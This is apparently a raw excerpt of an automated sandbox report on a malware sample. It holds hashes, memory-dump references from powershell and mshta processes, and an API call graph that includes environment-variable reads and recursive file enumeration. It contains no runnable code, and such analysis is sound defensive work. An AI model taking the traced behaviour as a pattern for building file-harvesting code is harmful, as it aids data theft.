                                                                                                                                              • Opcode ID: bc61813c35a562cd36adffc3daa9eeeaf667a6139c50f290ba7ba1bc8064ec38
                                                                                                                                              • Instruction ID: 82e69b4079e767f8af76e5019e8c1997a090c16a40636c4d8a2d6cf3395d115f
                                                                                                                                              • Opcode Fuzzy Hash: bc61813c35a562cd36adffc3daa9eeeaf667a6139c50f290ba7ba1bc8064ec38
                                                                                                                                              • Instruction Fuzzy Hash: C5610A21A1EA8B0FE75AA33C94513797BD2EF46794F1800FAC48EC71E3E918AC65C351

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 167 7fe89a70f1c-7fe89a70f22 168 7fe89a70f6c 167->168 169 7fe89a70f24-7fe89a70f30 167->169 172 7fe89a70fb6-7fe89a70fbc 168->172 173 7fe89a70f6e-7fe89a70f8f 168->173 170 7fe89a70f36-7fe89a70f3b 169->170 171 7fe89a70fbd-7fe89a70fc7 169->171 170->171 176 7fe89a70f41-7fe89a70f6b 170->176 174 7fe89a70fc9-7fe89a70fdb 171->174 175 7fe89a70fdc-7fe89a70fec 171->175 177 7fe89a70f96-7fe89a70f9e 173->177 178 7fe89a70ff9-7fe89a71049 175->178 179 7fe89a70fee-7fe89a70ff2 175->179 176->168 180 7fe89a70fa6-7fe89a70fab 177->180 181 7fe89a70fa0-7fe89a70fa4 177->181 179->178 183 7fe89a70fac-7fe89a70fb5 180->183 181->183 183->172
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.476444652.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_7fe89a70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8b70e28a00b2db4f231881e344c3a3457e3c9ac38958133a6c958c49f97bc1e8
                                                                                                                                              • Instruction ID: 4a9094754af8bc1272da33e06671015898e2f683434cd393c3e3e547b10894ed
                                                                                                                                              • Opcode Fuzzy Hash: 8b70e28a00b2db4f231881e344c3a3457e3c9ac38958133a6c958c49f97bc1e8
                                                                                                                                              • Instruction Fuzzy Hash: D441D631A1CB988FEB55EF1CA4423E87BD1EB45760F1401ABE58AC31A2D721B846C7C2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.476444652.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_7fe89a70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7ba45ebb51ac9f345f6713670f85c1770a3490bd2f15922d50bacacf211e80b9
                                                                                                                                              • Instruction ID: 61b61a6a51bc8cb315f3f6ad344eb6150efd85b2c19bd71524a8d959ddcac350
                                                                                                                                              • Opcode Fuzzy Hash: 7ba45ebb51ac9f345f6713670f85c1770a3490bd2f15922d50bacacf211e80b9
                                                                                                                                              • Instruction Fuzzy Hash: 17F0B421E0D9AE1BEB96A33C64152E47B91EF5A165B2901E6C4CDD3163D9045C244380
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.476444652.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_7fe89a70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3ff77fd9115f240512bdab9714d911a4a0aba5718ee36b7d5a9b45334b9491ff
                                                                                                                                              • Instruction ID: 034f6b3dd86ae762e8b9a41e75ba916ee2e6e543676a6010c897a3a5021a3498
                                                                                                                                              • Opcode Fuzzy Hash: 3ff77fd9115f240512bdab9714d911a4a0aba5718ee36b7d5a9b45334b9491ff
                                                                                                                                              • Instruction Fuzzy Hash: C7E09B32E099395FE795665C540B2A9B3D0EF056A1F1501F7C8CEE7176D5156C614380
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000F.00000003.461262229.0000000003670000.00000010.00000800.00020000.00000000.sdmp, Offset: 03670000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_15_3_3670000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                              • Instruction ID: c9026b3e94615e65e1841d6fb273d5184dc00687769aa1ed7d6fabe3a9862035
                                                                                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000F.00000003.461262229.0000000003670000.00000010.00000800.00020000.00000000.sdmp, Offset: 03670000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_15_3_3670000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                              • Instruction ID: c9026b3e94615e65e1841d6fb273d5184dc00687769aa1ed7d6fabe3a9862035
                                                                                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000F.00000003.461262229.0000000003670000.00000010.00000800.00020000.00000000.sdmp, Offset: 03670000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_15_3_3670000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                              • Instruction ID: c9026b3e94615e65e1841d6fb273d5184dc00687769aa1ed7d6fabe3a9862035
                                                                                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                              • Instruction Fuzzy Hash:

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:6.7%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:2.6%
                                                                                                                                              Total number of Nodes:1687
                                                                                                                                              Total number of Limit Nodes:24
                                                                                                                                              execution_graph 7044 10008640 7047 10008657 7044->7047 7048 10008665 7047->7048 7049 10008679 7047->7049 7050 10006368 __dosmaperr 19 API calls 7048->7050 7051 10008681 7049->7051 7052 10008693 7049->7052 7053 1000866a 7050->7053 7054 10006368 __dosmaperr 19 API calls 7051->7054 7055 100054a7 __fassign 36 API calls 7052->7055 7058 10008652 7052->7058 7056 100062ac ___std_exception_copy 25 API calls 7053->7056 7057 10008686 7054->7057 7055->7058 7056->7058 7059 100062ac ___std_exception_copy 25 API calls 7057->7059 7059->7058 7615 10007a80 7616 10007a8d 7615->7616 7617 1000637b __dosmaperr 19 API calls 7616->7617 7618 10007aa7 7617->7618 7619 1000571e _free 19 API calls 7618->7619 7620 10007ab3 7619->7620 7621 1000637b __dosmaperr 19 API calls 7620->7621 7625 10007ad9 7620->7625 7622 10007acd 7621->7622 7624 1000571e _free 19 API calls 7622->7624 7623 10005eb7 10 API calls 7623->7625 7624->7625 7625->7623 7626 10007ae5 7625->7626 6955 10007103 GetCommandLineA GetCommandLineW 6956 10005303 6959 100050a5 6956->6959 6968 1000502f 6959->6968 6962 1000502f 5 API calls 6963 100050c3 6962->6963 6972 10005000 6963->6972 6966 10005000 19 API calls 6967 100050d9 6966->6967 6969 10005048 6968->6969 6970 10002ada _ValidateLocalCookies 5 API calls 6969->6970 6971 10005069 6970->6971 6971->6962 6973 1000502a 6972->6973 6974 1000500d 6972->6974 6973->6966 6975 10005024 6974->6975 6976 1000571e _free 19 API calls 6974->6976 6977 1000571e _free 19 API calls 6975->6977 6976->6974 6977->6973 7060 1000af43 7061 1000af59 7060->7061 7062 1000af4d 7060->7062 7062->7061 7063 1000af52 CloseHandle 7062->7063 7063->7061 7064 1000a945 7066 1000a96d 7064->7066 7065 1000a9a5 7066->7065 7067 1000a997 7066->7067 7068 1000a99e 7066->7068 7073 1000aa17 7067->7073 7077 1000aa00 7068->7077 7074 1000aa20 7073->7074 7081 1000b19b 7074->7081 7078 1000aa20 7077->7078 7079 1000b19b __startOneArgErrorHandling 20 API calls 7078->7079 7080 1000a9a3 7079->7080 7082 1000b1da __startOneArgErrorHandling 7081->7082 7086 1000b25c __startOneArgErrorHandling 7082->7086 7091 1000b59e 7082->7091 7084 1000b286 7087 1000b292 7084->7087 7098 1000b8b2 7084->7098 7086->7084 7094 100078a3 7086->7094 7089 10002ada _ValidateLocalCookies 5 API calls 7087->7089 7090 1000a99c 7089->7090 7105 1000b5c1 7091->7105 7095 100078cb 7094->7095 7096 10002ada _ValidateLocalCookies 5 API calls 7095->7096 7097 100078e8 7096->7097 7097->7084 7099 1000b8d4 7098->7099 7100 1000b8bf 7098->7100 7102 10006368 __dosmaperr 19 API calls 7099->7102 7101 1000b8d9 7100->7101 7103 10006368 __dosmaperr 19 API calls 7100->7103 7101->7087 7102->7101 7104 1000b8cc 7103->7104 7104->7087 7106 1000b5ec __raise_exc 7105->7106 7107 1000b7e5 RaiseException 7106->7107 7108 1000b5bc 7107->7108 7108->7086 7722 1000a1c6 IsProcessorFeaturePresent 7723 10007bc7 7724 10007bd3 ___scrt_is_nonwritable_in_current_image 7723->7724 7725 10007c0a _abort 7724->7725 7731 10005671 RtlEnterCriticalSection 7724->7731 7727 10007be7 7728 10007f86 __fassign 19 API calls 7727->7728 7729 10007bf7 7728->7729 7732 10007c10 7729->7732 7731->7727 7735 100056b9 RtlLeaveCriticalSection 7732->7735 7734 10007c17 7734->7725 7735->7734 7109 10005348 7110 10003529 ___vcrt_uninitialize 7 API calls 7109->7110 7111 1000534f 7110->7111 7112 10007b48 7122 10008ebf 7112->7122 7116 10007b55 7135 1000907c 7116->7135 7119 10007b7f 7120 1000571e _free 19 API calls 7119->7120 7121 10007b8a 7120->7121 7139 10008ec8 7122->7139 7124 10007b50 7125 10008fdc 7124->7125 7126 10008fe8 ___scrt_is_nonwritable_in_current_image 7125->7126 7159 10005671 RtlEnterCriticalSection 7126->7159 7128 1000905e 7173 10009073 7128->7173 7130 10008ff3 7130->7128 7132 10009032 RtlDeleteCriticalSection 7130->7132 7160 1000a09c 7130->7160 7131 1000906a _abort 7131->7116 7134 1000571e _free 19 API calls 7132->7134 7134->7130 7136 10009092 7135->7136 7137 10007b64 RtlDeleteCriticalSection 7135->7137 7136->7137 7138 1000571e _free 19 API calls 7136->7138 7137->7116 7137->7119 7138->7137 7140 10008ed4 ___scrt_is_nonwritable_in_current_image 7139->7140 7149 10005671 RtlEnterCriticalSection 7140->7149 7142 10008f77 7154 10008f97 7142->7154 7145 10008f83 _abort 7145->7124 7147 10008e78 63 API calls 7148 10008ee3 7147->7148 7148->7142 7148->7147 7150 10007b94 RtlEnterCriticalSection 7148->7150 7151 10008f6d 7148->7151 7149->7148 7150->7148 7157 10007ba8 RtlLeaveCriticalSection 7151->7157 7153 10008f75 7153->7148 7158 100056b9 RtlLeaveCriticalSection 7154->7158 7156 10008f9e 7156->7145 7157->7153 7158->7156 7159->7130 7161 1000a0a8 ___scrt_is_nonwritable_in_current_image 7160->7161 7162 1000a0b9 7161->7162 7163 1000a0ce 7161->7163 7164 10006368 __dosmaperr 19 API calls 7162->7164 7172 1000a0c9 _abort 7163->7172 7176 10007b94 RtlEnterCriticalSection 7163->7176 7165 1000a0be 7164->7165 7167 100062ac ___std_exception_copy 25 API calls 7165->7167 7167->7172 7168 1000a0ea 7177 1000a026 7168->7177 7170 1000a0f5 7193 1000a112 7170->7193 7172->7130 7441 100056b9 RtlLeaveCriticalSection 7173->7441 7175 1000907a 7175->7131 7176->7168 7178 1000a033 7177->7178 7180 1000a048 7177->7180 7179 10006368 __dosmaperr 19 API calls 7178->7179 7181 1000a038 7179->7181 7185 1000a043 7180->7185 7196 10008e12 7180->7196 7183 100062ac ___std_exception_copy 25 API calls 7181->7183 7183->7185 7185->7170 7186 1000907c 19 API calls 7187 1000a064 7186->7187 7202 10007a5a 7187->7202 7189 1000a06a 7209 1000adce 7189->7209 7192 1000571e _free 19 API calls 7192->7185 7440 10007ba8 RtlLeaveCriticalSection 7193->7440 7195 1000a11a 7195->7172 7197 10008e26 7196->7197 7198 10008e2a 7196->7198 7197->7186 7198->7197 7199 10007a5a 25 API calls 7198->7199 7200 10008e4a 7199->7200 7224 10009a22 7200->7224 7203 10007a66 7202->7203 7204 10007a7b 7202->7204 7205 10006368 __dosmaperr 19 API calls 7203->7205 7204->7189 7206 10007a6b 7205->7206 7207 100062ac ___std_exception_copy 25 API calls 7206->7207 7208 10007a76 7207->7208 7208->7189 7210 1000addd 7209->7210 7211 1000adf2 7209->7211 7213 10006355 __dosmaperr 19 API calls 7210->7213 7212 1000ae2d 7211->7212 7216 1000ae19 7211->7216 7214 10006355 __dosmaperr 19 API calls 7212->7214 7215 1000ade2 7213->7215 7217 1000ae32 7214->7217 7218 10006368 __dosmaperr 19 API calls 7215->7218 7397 1000ada6 7216->7397 7220 10006368 __dosmaperr 19 API calls 7217->7220 7221 1000a070 7218->7221 7222 1000ae3a 7220->7222 7221->7185 7221->7192 7223 100062ac ___std_exception_copy 25 API calls 7222->7223 7223->7221 7225 10009a2e ___scrt_is_nonwritable_in_current_image 7224->7225 7226 10009a36 7225->7226 7227 10009a4e 7225->7227 7249 10006355 7226->7249 7229 10009aec 7227->7229 7233 10009a83 7227->7233 7231 10006355 __dosmaperr 19 API calls 7229->7231 7234 10009af1 7231->7234 7232 10006368 __dosmaperr 19 API calls 7245 10009a43 _abort 7232->7245 7252 10008c7b RtlEnterCriticalSection 7233->7252 7236 10006368 __dosmaperr 19 API calls 7234->7236 7238 10009af9 7236->7238 7237 10009a89 7239 10009aa5 7237->7239 7240 10009aba 7237->7240 7241 100062ac ___std_exception_copy 25 API calls 7238->7241 7242 10006368 __dosmaperr 19 API calls 7239->7242 7253 10009b0d 7240->7253 7241->7245 7244 10009aaa 7242->7244 7247 10006355 __dosmaperr 19 API calls 7244->7247 7245->7197 7246 10009ab5 7304 10009ae4 7246->7304 7247->7246 7250 10005b7a __dosmaperr 19 API calls 7249->7250 7251 1000635a 7250->7251 7251->7232 7252->7237 7254 10009b3b 7253->7254 7292 10009b34 7253->7292 7255 10009b5e 7254->7255 7256 10009b3f 7254->7256 7259 10009baf 7255->7259 7260 10009b92 7255->7260 7258 10006355 __dosmaperr 19 API calls 7256->7258 7257 10002ada _ValidateLocalCookies 5 API calls 7261 10009d15 7257->7261 7262 10009b44 7258->7262 7264 10009bc5 7259->7264 7307 1000a00b 7259->7307 7263 10006355 __dosmaperr 19 API calls 7260->7263 7261->7246 7265 10006368 __dosmaperr 19 API calls 7262->7265 7267 10009b97 7263->7267 7310 100096b2 7264->7310 7269 10009b4b 7265->7269 7271 10006368 __dosmaperr 19 API calls 7267->7271 7272 100062ac ___std_exception_copy 25 API calls 7269->7272 7275 10009b9f 7271->7275 7272->7292 7273 10009bd3 7276 10009bd7 7273->7276 7277 10009bf9 7273->7277 7274 10009c0c 7279 10009c20 7274->7279 7280 10009c66 WriteFile 7274->7280 7278 100062ac ___std_exception_copy 25 API calls 7275->7278 7281 10009ccd 7276->7281 7317 10009645 7276->7317 7322 10009492 GetConsoleCP 7277->7322 7278->7292 7284 10009c56 7279->7284 7285 10009c28 7279->7285 7283 10009c89 GetLastError 7280->7283 7288 10009bef 7280->7288 7281->7292 7293 10006368 __dosmaperr 19 API calls 7281->7293 7283->7288 7348 10009728 7284->7348 7289 10009c46 7285->7289 7290 10009c2d 7285->7290 7288->7281 7288->7292 7296 10009ca9 7288->7296 7340 100098f5 7289->7340 7290->7281 7333 10009807 7290->7333 7292->7257 7295 10009cf2 7293->7295 7297 10006355 __dosmaperr 19 API calls 7295->7297 7298 10009cb0 7296->7298 7299 10009cc4 7296->7299 7297->7292 7300 10006368 __dosmaperr 19 API calls 7298->7300 7355 10006332 7299->7355 7302 10009cb5 7300->7302 7303 10006355 __dosmaperr 19 API calls 7302->7303 7303->7292 7396 10008c9e RtlLeaveCriticalSection 7304->7396 7306 10009aea 7306->7245 7360 10009f8d 7307->7360 7382 10008dbc 7310->7382 7312 100096c2 7313 100096c7 7312->7313 7314 10005af6 _abort 36 API calls 7312->7314 7313->7273 7313->7274 7315 100096ea 7314->7315 7315->7313 7316 10009708 GetConsoleMode 7315->7316 7316->7313 7319 1000969f 7317->7319 7321 1000966a 7317->7321 7318 100096a1 GetLastError 7318->7319 7319->7288 7320 1000a181 WriteConsoleW 7320->7321 7321->7318 7321->7319 7321->7320 7330 100094f5 7322->7330 7332 10009607 7322->7332 7323 10002ada _ValidateLocalCookies 5 API calls 7324 10009641 7323->7324 7324->7288 7326 100079e6 38 API calls __fassign 7326->7330 7327 1000957b WideCharToMultiByte 7328 100095a1 WriteFile 7327->7328 7327->7332 7329 1000962a GetLastError 7328->7329 7328->7330 7329->7332 7330->7326 7330->7327 7331 100095d2 WriteFile 7330->7331 7330->7332 7391 10007c19 7330->7391 7331->7329 7331->7330 7332->7323 7334 10009816 7333->7334 7335 100098d8 7334->7335 7336 10009894 WriteFile 7334->7336 7337 10002ada _ValidateLocalCookies 5 API calls 7335->7337 7336->7334 7339 100098da GetLastError 7336->7339 7338 100098f1 7337->7338 7338->7288 7339->7335 7345 10009904 7340->7345 7341 10009a0f 7342 10002ada _ValidateLocalCookies 5 API calls 7341->7342 7344 10009a1e 7342->7344 7343 10009986 WideCharToMultiByte 7346 10009a07 GetLastError 7343->7346 7347 100099bb WriteFile 7343->7347 7344->7288 7345->7341 7345->7343 7345->7347 7346->7341 7347->7345 7347->7346 7349 10009737 7348->7349 7350 100097ea 7349->7350 7352 100097a9 WriteFile 7349->7352 7351 10002ada _ValidateLocalCookies 5 API calls 7350->7351 7353 10009803 7351->7353 7352->7349 7354 100097ec GetLastError 7352->7354 7353->7288 7354->7350 7356 10006355 __dosmaperr 19 API calls 7355->7356 7357 1000633d __dosmaperr 7356->7357 7358 10006368 __dosmaperr 19 API calls 7357->7358 7359 10006350 7358->7359 7359->7292 7369 10008d52 7360->7369 7362 10009f9f 7363 10009fa7 7362->7363 7364 10009fb8 SetFilePointerEx 7362->7364 7366 10006368 __dosmaperr 19 API calls 7363->7366 7365 10009fd0 GetLastError 7364->7365 7368 10009fac 7364->7368 7367 10006332 __dosmaperr 19 API calls 7365->7367 7366->7368 7367->7368 7368->7264 7370 10008d5f 7369->7370 7371 10008d74 7369->7371 7372 10006355 __dosmaperr 19 API calls 7370->7372 7374 10006355 __dosmaperr 19 API calls 7371->7374 7376 10008d99 7371->7376 7373 10008d64 7372->7373 7375 10006368 __dosmaperr 19 API calls 7373->7375 7377 10008da4 7374->7377 7378 10008d6c 7375->7378 7376->7362 7379 10006368 __dosmaperr 19 API calls 7377->7379 7378->7362 7380 10008dac 7379->7380 7381 100062ac ___std_exception_copy 25 API calls 7380->7381 7381->7378 7383 10008dc9 7382->7383 7385 10008dd6 7382->7385 7384 10006368 __dosmaperr 19 API calls 7383->7384 7388 10008dce 7384->7388 7386 10008de2 7385->7386 7387 10006368 __dosmaperr 19 API calls 7385->7387 7386->7312 7389 10008e03 7387->7389 7388->7312 7390 100062ac ___std_exception_copy 25 API calls 7389->7390 7390->7388 7392 10005af6 _abort 36 API calls 7391->7392 7393 10007c24 7392->7393 7394 10007a00 __fassign 36 API calls 7393->7394 7395 10007c34 7394->7395 7395->7330 7396->7306 7400 1000ad24 7397->7400 7399 1000adca 7399->7221 7401 1000ad30 ___scrt_is_nonwritable_in_current_image 7400->7401 7411 10008c7b RtlEnterCriticalSection 7401->7411 7403 1000ad3e 7404 1000ad70 7403->7404 7405 1000ad65 7403->7405 7406 10006368 __dosmaperr 19 API calls 7404->7406 7412 1000ae4d 7405->7412 7408 1000ad6b 7406->7408 7427 1000ad9a 7408->7427 7410 1000ad8d _abort 7410->7399 7411->7403 7413 10008d52 25 API calls 7412->7413 7416 1000ae5d 7413->7416 7414 1000ae63 7430 10008cc1 7414->7430 7416->7414 7417 1000ae95 7416->7417 7418 10008d52 25 API calls 7416->7418 7417->7414 7419 10008d52 25 API calls 7417->7419 7421 1000ae8c 7418->7421 7422 1000aea1 CloseHandle 7419->7422 7424 10008d52 25 API calls 7421->7424 7422->7414 7425 1000aead GetLastError 7422->7425 7423 1000aedd 7423->7408 7424->7417 7425->7414 7426 10006332 __dosmaperr 19 API calls 7426->7423 7439 10008c9e RtlLeaveCriticalSection 7427->7439 7429 1000ada4 7429->7410 7431 10008cd0 7430->7431 7432 10008d37 7430->7432 7431->7432 7436 10008cfa 7431->7436 7433 10006368 __dosmaperr 19 API calls 7432->7433 7434 10008d3c 7433->7434 7435 10006355 __dosmaperr 19 API calls 7434->7435 7437 10008d27 7435->7437 7436->7437 7438 10008d21 SetStdHandle 7436->7438 7437->7423 7437->7426 7438->7437 7439->7429 7440->7195 7441->7175 7442 10002049 7443 10002055 ___scrt_is_nonwritable_in_current_image 7442->7443 7444 100020d3 7443->7444 7445 1000207d 7443->7445 7455 1000205e 7443->7455 7447 10002639 ___scrt_fastfail 4 API calls 7444->7447 7456 1000244c 7445->7456 7449 100020da 7447->7449 7448 10002082 7465 10002308 7448->7465 7451 10002087 __RTC_Initialize 7468 100020c4 7451->7468 7453 1000209f 7471 1000260b 7453->7471 7457 10002451 ___scrt_release_startup_lock 7456->7457 7458 10002455 7457->7458 7460 10002461 7457->7460 7459 1000527a _abort 19 API calls 7458->7459 7461 1000245f 7459->7461 7462 1000246e 7460->7462 7463 1000499b _abort 26 API calls 7460->7463 7461->7448 7462->7448 7464 10004bbd 7463->7464 7464->7448 7477 100034c7 RtlInterlockedFlushSList 7465->7477 7467 10002312 7467->7451 7479 1000246f 7468->7479 7470 100020c9 ___scrt_release_startup_lock 7470->7453 7472 10002617 7471->7472 7473 1000262d 7472->7473 7487 100053ed 7472->7487 7473->7455 7476 10003529 ___vcrt_uninitialize 7 API calls 7476->7473 7478 100034d7 7477->7478 7478->7467 7484 100053ff 7479->7484 7482 1000391b ___vcrt_uninitialize_ptd 5 API calls 7483 1000354d 7482->7483 7483->7470 7485 10005c2b 10 API calls 7484->7485 7486 10002476 7485->7486 7486->7482 7490 100074da 7487->7490 7493 100074f3 7490->7493 7491 10002ada _ValidateLocalCookies 5 API calls 7492 10002625 7491->7492 7492->7476 7493->7491 7627 10008a89 7630 10006d60 7627->7630 7631 10006d69 7630->7631 7632 10006d72 7630->7632 7633 10006c5f 49 API calls 7631->7633 7633->7632 6802 1000220c 6803 10002215 6802->6803 6804 1000221a dllmain_dispatch 6802->6804 6806 100022b1 6803->6806 6807 100022c7 6806->6807 6809 100022d0 6807->6809 6810 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6807->6810 6809->6804 6810->6809 7494 1000724e GetProcessHeap 7495 1000284f 7496 10002882 std::exception::exception 26 API calls 7495->7496 7497 1000285d 7496->7497 7638 10003c90 RtlUnwind 7736 100036d0 7737 100036e2 7736->7737 7739 100036f0 @_EH4_CallFilterFunc@8 7736->7739 7738 10002ada _ValidateLocalCookies 5 API calls 7737->7738 7738->7739 7498 10005351 7499 10005360 7498->7499 7500 10005374 7498->7500 7499->7500 7503 1000571e _free 19 API calls 7499->7503 7501 1000571e _free 19 API calls 7500->7501 7502 10005386 7501->7502 7504 1000571e _free 19 API calls 7502->7504 7503->7500 7505 10005399 7504->7505 7506 1000571e _free 19 API calls 7505->7506 7507 100053aa 7506->7507 7508 1000571e _free 19 API calls 7507->7508 7509 100053bb 7508->7509 7740 100073d5 7741 100073e1 ___scrt_is_nonwritable_in_current_image 7740->7741 7752 10005671 RtlEnterCriticalSection 7741->7752 7743 100073e8 7744 10008be3 26 API calls 7743->7744 7745 100073f7 7744->7745 7746 10007406 7745->7746 7753 10007269 GetStartupInfoW 7745->7753 7764 10007422 7746->7764 7750 10007417 _abort 7752->7743 7754 10007286 7753->7754 7756 10007318 7753->7756 7755 10008be3 26 API calls 7754->7755 7754->7756 7757 100072af 7755->7757 7759 1000731f 7756->7759 7757->7756 7758 100072dd GetFileType 7757->7758 7758->7757 7763 10007326 7759->7763 7760 10007369 GetStdHandle 7760->7763 7761 100073d1 7761->7746 7762 1000737c GetFileType 7762->7763 7763->7760 7763->7761 7763->7762 7767 100056b9 RtlLeaveCriticalSection 7764->7767 7766 10007429 7766->7750 7767->7766 7768 10004ed7 7769 10006d60 49 API calls 7768->7769 7770 10004ee9 7769->7770 7779 10007153 GetEnvironmentStringsW 7770->7779 7774 10004eff 7777 1000571e _free 19 API calls 7774->7777 7775 1000571e _free 19 API calls 7776 10004f29 7775->7776 7778 10004ef4 7777->7778 7778->7775 7780 100071bd 7779->7780 7781 1000716a 7779->7781 7783 100071c6 FreeEnvironmentStringsW 7780->7783 7784 10004eee 7780->7784 7782 10007170 WideCharToMultiByte 7781->7782 7782->7780 7785 1000718c 7782->7785 7783->7784 7784->7778 7791 10004f2f 7784->7791 7786 100056d0 20 API calls 7785->7786 7787 10007192 7786->7787 7788 100071af 7787->7788 7789 10007199 WideCharToMultiByte 7787->7789 7790 1000571e _free 19 API calls 7788->7790 7789->7788 7790->7780 7792 10004f44 7791->7792 7793 1000637b __dosmaperr 19 API calls 7792->7793 7794 10004f6b 7793->7794 7796 10004fcf 7794->7796 7798 1000637b __dosmaperr 19 API calls 7794->7798 7799 10004fd1 7794->7799 7800 1000544d ___std_exception_copy 25 API calls 7794->7800 7803 10004ff3 7794->7803 7806 1000571e _free 19 API calls 7794->7806 7795 1000571e _free 19 API calls 7797 10004fe9 7795->7797 7796->7795 7797->7774 7798->7794 7801 10005000 19 API calls 7799->7801 7800->7794 7802 10004fd7 7801->7802 7804 1000571e _free 19 API calls 7802->7804 7805 100062bc ___std_exception_copy 11 API calls 7803->7805 7804->7796 7807 10004fff 7805->7807 7806->7794 6978 10002418 6979 10002420 ___scrt_release_startup_lock 6978->6979 6982 100047f5 6979->6982 6981 10002448 6983 10004804 6982->6983 6984 10004808 6982->6984 6983->6981 6987 10004815 6984->6987 6988 10005b7a __dosmaperr 19 API calls 6987->6988 6991 1000482c 6988->6991 6989 10002ada _ValidateLocalCookies 5 API calls 6990 10004811 6989->6990 6990->6981 6991->6989 7639 10004a9a 7642 10005411 7639->7642 7643 1000541d _abort 7642->7643 7644 10005af6 _abort 36 API calls 7643->7644 7647 10005422 7644->7647 7645 100055a8 _abort 36 API calls 7646 1000544c 7645->7646 7647->7645 6509 10001c5b 6510 10001c6b ___scrt_fastfail 6509->6510 6513 100012ee 6510->6513 6512 10001c87 6514 10001324 ___scrt_fastfail 6513->6514 6515 100013b7 GetEnvironmentVariableW 6514->6515 6539 100010f1 6515->6539 6518 100010f1 51 API calls 6519 10001465 6518->6519 6520 100010f1 51 API calls 6519->6520 6521 10001479 6520->6521 6522 100010f1 51 API calls 6521->6522 6523 1000148d 6522->6523 6524 100010f1 51 API calls 6523->6524 6525 100014a1 6524->6525 6526 100010f1 51 API calls 6525->6526 6527 100014b5 lstrlenW 6526->6527 6528 100014d2 6527->6528 6529 100014d9 lstrlenW 6527->6529 6528->6512 6530 100010f1 51 API calls 6529->6530 6531 10001501 lstrlenW lstrcatW 6530->6531 6532 100010f1 51 API calls 6531->6532 6533 10001539 lstrlenW lstrcatW 6532->6533 6534 100010f1 51 API calls 6533->6534 6535 1000156b lstrlenW lstrcatW 6534->6535 6536 100010f1 51 API calls 6535->6536 6537 1000159d lstrlenW lstrcatW 6536->6537 6538 100010f1 51 API calls 6537->6538 6538->6528 6540 10001118 ___scrt_fastfail 6539->6540 6541 10001129 lstrlenW 6540->6541 6552 10002c40 6541->6552 6543 10001148 lstrcatW lstrlenW 6544 10001177 lstrlenW FindFirstFileW 6543->6544 6545 10001168 lstrlenW 6543->6545 6546 100011a0 6544->6546 6547 100011e1 6544->6547 6545->6544 6548 100011c7 FindNextFileW 6546->6548 6549 100011aa 6546->6549 6547->6518 6548->6546 6551 100011da FindClose 6548->6551 6549->6548 6554 10001000 6549->6554 6551->6547 6553 10002c57 6552->6553 6553->6543 6553->6553 6555 10001022 ___scrt_fastfail 6554->6555 6556 100010af 6555->6556 6557 1000102f lstrcatW lstrlenW 6555->6557 6560 100010b5 lstrlenW 6556->6560 6570 100010ad 6556->6570 6558 1000105a lstrlenW 6557->6558 6559 1000106b lstrlenW 6557->6559 6558->6559 6571 10001e89 lstrlenW 6559->6571 6585 10001e16 6560->6585 6563 10001088 GetFileAttributesW 6566 1000109c 6563->6566 6563->6570 6564 100010ca 6565 10001e89 5 API calls 6564->6565 6564->6570 6567 100010df 6565->6567 6566->6570 6577 1000173a 6566->6577 6590 100011ea 